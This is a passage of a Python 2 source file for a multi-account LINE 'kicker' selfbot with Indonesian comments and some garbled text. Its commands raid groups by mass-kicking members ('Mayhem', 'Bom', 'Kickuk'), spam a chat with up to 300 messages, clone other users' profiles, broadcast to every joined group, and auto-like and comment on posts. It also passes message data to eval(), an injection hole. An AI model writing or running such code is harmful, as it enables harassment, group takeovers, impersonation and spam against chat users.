cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•候語確èª"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#---------------------Sc invite owner ke group------
elif "/invitemeto: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("/invitemeto: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é 留言:開"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["コメント:オフ","Comment on","Comment off","自動首é 留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif msg.text in ["Comment","留言確èª"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Jam on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Jam off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif msg.text in ["Change clock "]:
n = msg.text.replace("Change clock ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Jam Update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
#-----------------------------------------------
#-----------------------------------------------
elif "Check:" in msg.text:
midd = msg.text.replace("Check:","")
msg.contentType = 13
msg.contentMetadata = {"mid":midd}
cl.sendMessage(msg)
elif "Clone all " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.CloneContactProfile(target)
ki2.CloneContactProfile(target)
ki3.CloneContactProfile(target)
ki4.CloneContactProfile(target)
ki5.CloneContactProfile(target)
ki.sendText(msg.to,"Clone Success")
ki2.sendText(msg.to,"Clone Success")
ki3.sendText(msg.to,"Clone Success")
ki4.sendText(msg.to,"Clone Success")
ki5.sendText(msg.to,"Clone Success")
except Exception as e:
cl.sendText(msg.to,"Clone Fail")
print e
elif msg.text in ["Backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to,"Backup done")
except Exception as e:
cl.sendText(msg.to, str (e))
elif "Copy @" in msg.text:
if msg.toType == 2:
print "[Copy]"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Succes")
except Exception as e:
print e
elif "Allbio:" in msg.text:
if msg.from_ in admin:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
elif msg.text in ["Join","one","One"]:
if msg.from_ in admin or Bots:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
cl.updateGroup(G)
elif msg.text in ["All"]:
if msg.from_ in Bots or staff:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
cl.updateGroup(G)
#-----------------------------------------------
elif msg.text in ["Bye wm"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
ki7.leaveGroup(msg.to)
ki8.leaveGroup(msg.to)
ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif msg.text in ["Bye"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
#-------------Fungsi Tagall User Start---------------#
elif msg.text in ["Cipok","Tagall"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
#-------------Fungsi Tag All Finish---------------#
elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in staff:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Owner")
try:
likePost()
except:
pass
elif msg.text in ["Like", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in staff:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Teman Boss")
try:
autolike()
except:
pass
#-----------------------------------------------
elif msg.text in ["Kill"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Sorry!!")
ki2.sendText(msg.to,"(´・ω・`)")
return
for jj in matched_list:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#---------------kickall started----------------#
elif "Mayhem" in msg.text:
if msg.from_ in Bots or staff:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Mayhem","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
ki.sendText(msg.to,"「 Mayhem 」\nMayhem is STARTING♪\n abort to abort♪")
ki2.sendText(msg.to,"「 Mayhem 」\n46 victims shall yell hul·la·ba·loo♪\nhələbəˈlo͞o hələbəˌlo͞o")
ki3.sendText(msg.to,"Good Bye (*´・ω・*)")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to,"Not Found")
else:
for target in targets:
if target not in Bots and staff:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki3.sendText(msg.to,"Mayhem done")
#-----------------------[Cleanse Edited By Toby]------------------------
elif ("Bom" in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Bom","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
ki.sendText(msg.to,"🔸We come to destroy your group🔸")
ki2.sendText(msg.to,"Relax slow slow no baper...😂😂")
ki3.sendText(msg.to,"Kenapa diem aja?")
ki4.sendText(msg.to,"Tangkis Bego Jangan Gemeter...😘")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
ki4.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Hm..")
#----------------kickall finish----------------------#
elif "Kickuk" in msg.text:
if msg.from_ in admin or staff:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Kickuk","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
#ki.sendText(msg.to,"Just some casual cleansing ô")
#ki2.sendText(msg.to,"Group cleansed.")
#ki3.sendText(msg.to,"Fuck You All")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found.")
ki2.sendText(msg.to,"Not found.")
ki3.sendText(msg.to,"Not found.")
else:
for target in targets:
if target not in Bots and admin:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleanse")
ki2.sendText(msg.to,"Group cleanse")
ki3.sendText(msg.to,"Group cleanse")
elif "Nk " in msg.text:
if msg.from_ in Bots or staff:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
klist=[cl,ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Sorry...")
ki3.sendText(msg.to,"(´・ω・`)")
#-----------------------------------------------
elif "Vk " in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
pass
elif "Blacklist @ " in msg.text:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = ki2.getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
k3.sendText(msg.to,"Succes ")
except:
ki.sendText(msg.to,"error")
elif "Banned @" in msg.text:
if msg.from_ in Bots or staff:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
#ki.sendText(msg.to,"Dilarang Banned Bot")
#ki2.sendText(msg.to,"Dilarang Banned Bot")
#ki3.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun telah sukses di banned")
except:
ki.sendText(msg.to,"Error")
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
elif msg.text in ["Clear ban"]:
if msg.from_ in admin:
wait["blacklist"] = {}
random.choice(KAC).sendText(msg.to,"Clear All Ban Done")
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
kc.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in staff:
bctxt = msg.text.replace("Bc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = ki2.getGroupIdsJoined()
a = ki3.getGroupIdsJoined()
a = ki4.getGroupIdsJoined()
a = ki5.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
ki2.sendText(taf, (bctxt))
ki3.sendText(taf, (bctxt))
ki4.sendText(taf, (bctxt))
ki5.sendText(taf, (bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#------------ Keluar Dari Semua Group------
elif msg.text in ["FAF out","Op bye"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in admin:
#gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
gid = ki3.getGroupIdsJoined()
gid = ki4.getGroupIdsJoined()
gid = ki5.getGroupIdsJoined()
for i in gid:
ki5.leaveGroup(i)
ki4.leaveGroup(i)
ki3.leaveGroup(i)
ki2.leaveGroup(i)
ki.leaveGroup(i)
#cl.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sayonara")
else:
cl.sendText(msg.to,"He declined all invitations")
#-----------------------------------------------
elif msg.text in ["Test"]:
ki.sendText(msg.to,"Ok double thumbs up")
ki2.sendText(msg.to,"Ok double thumbs up")
ki3.sendText(msg.to,"Ok double thumbs up")
#-----------------------------------------------
#elif "Bc " in msg.text:
#bctxt = msg.text.replace("Bc ","")
#ki.sendText(msg.to,(bctxt))
#ki2.sendText(msg.to,(bctxt))
#ki3.sendText(msg.to,(bctxt))
#-----------------------------------------------
elif msg.text in ["say hi"]:
ki.sendText(msg.to,"Hi buddy Har Har")
ki2.sendText(msg.to,"Hi buddy Har Har")
ki3.sendText(msg.to,"Hi buddy Har Har")
#-----------------------------------------------
elif msg.text in ["say hinata pekok"]:
ki.sendText(msg.to,"Hinata pekok Har Har")
ki2.sendText(msg.to,"Hinata pekok Har Har")
ki3.sendText(msg.to,"Hinata pekok Har Har")
elif msg.text in ["#welcome"]:
ki.sendText(msg.to,"Selamat datang di Chivas Family Room")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
#-----------------------------------------------
elif msg.text in ["Respon","respon"]:
ki.sendText(msg.to,"F.A.F ACTIVE")
ki2.sendText(msg.to,"F.A.F ACTIVE")
ki3.sendText(msg.to,"F.A.F ACTIVE")
ki4.sendText(msg.to,"F.A.F ACTIVE")
ki5.sendText(msg.to,"F.A.F ACTIVE")
#-----------------------------------------------
elif "Spam " in msg.text:
if msg.from_ in Bots or staff:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 300:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Kelebihan batas:v")
elif txt[1] == "off":
if jmlh <= 300:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Kelebihan batas :v")
elif msg.text == "Setp":
cl.sendText(msg.to, "Setpoint Telah Dipasang")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Cek":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "==== Tercyduk ==== %s\n\n==== Tersangka ====\n%s\n\nSetpoint Pada :\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Setpoint Dulu Tolol (Har Har) 「Setp」")
pass
elif msg.text in ["Sp","Speed","speed"]:
if msg.from_ in Bots:
start = time.time()
print("Speed")
elapsed_time = time.time() - start
cl.sendText(msg.to, "Progress...")
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
elif "Add staff @" in msg.text:
if msg.from_ in Bots:
print "[Command]Staff add executing"
_name = msg.text.replace("Add staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove staff @" in msg.text:
if msg.from_ in Bots:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Add admin @" in msg.text:
if msg.from_ in Bots:
print "[Command]admin add executing"
_name = msg.text.replace("Add admin @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the admin list")
except:
pass
print "[Command]admin add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove admin @" in msg.text:
if msg.from_ in Bots:
print "[Command]admin remove executing"
_name = msg.text.replace("Remove admin @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the admin list")
except:
pass
print "[Command]admin remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","stafflist"]:
if staff == []:
ki.sendText(msg.to,"The stafflist is empty")
else:
ki.sendText(msg.to,"Staff list:")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
ki.sendText(msg.to,mc)
print "[Command]Stafflist executed"
elif msg.text in ["Admin list","admin list"]:
if admin == []:
ki.sendText(msg.to,"The stafflist is empty")
else:
ki.sendText(msg.to,"Admin list:")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
ki.sendText(msg.to,mc)
print "[Command]Adminlist executed"
elif msg.text in ["Ip Like", "Ar like"]:
if msg.from_ in staff:
print "[Command]Like executed"
cl.sendText(msg.to,"Trying to Like post(s) from staff")
try:
likePost()
except:
pass
#------------------------------------------------------------------
elif msg.text in ["Banned"]:
if msg.from_ in admin or staff:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Unbanned"]:
if msg.from_ in admin or staff:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact")
#---------Fungsi Banlist With Tag--------#
elif msg.text in ["Banlist","ip banlist"]:
if wait["blacklist"] == {}:
ki.sendText(msg.to,"No user is Blacklisted")
else:
ki.sendText(msg.to,"Blacklisted user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +ki.getContact(mi_d).displayName + "\n"
ki.sendText(msg.to,mc)
print "[Command]Banlist executed"
#---------Fungsi Banlist With Tag Finish--------#
elif msg.text in ["Cek ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["Kill"]:
if msg.from_ in admin or staff:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"There was no blacklist user")
#ki2.sendText(msg.to,"There was no blacklist user")
#ki3.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
ki.sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ki.cancelGroupInvitation(msg.to,[_mid])
ki.sendText(msg.to,"I pretended to cancel and canceled.")
elif "album→" in msg.text:
try:
albumtags = msg.text.replace("album���","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "midb:" in msg.text:
midd = msg.text.replace("midb:","")
wait["blacklist"][midd] = True
elif "#終了" in msg.text:
try:
import sys
sys.exit()
except:
pass
if op.type == 55:
print "[NOTIFIED_READ_MESSAGE]"
try:
if op.param1 in wait2['readPoint']:
Nama = cl.getContact(op.param2).displayName
if Nama in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n-> " + Nama
wait2['ROM'][op.param1][op.param2] = "-> " + Nama
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
cl.sendText
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
def autolike():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto Like by Fras\n\nhttp://line.me/ti/p/~fras88")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil ['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto Like by Fras\n\nhttp://line.me/ti/p/~fras88")
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.60)
#thread2 = threading.Thread(target=autolike)
#thread2.daemon = True
#thread2.start()
#--------------------
def likePost():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
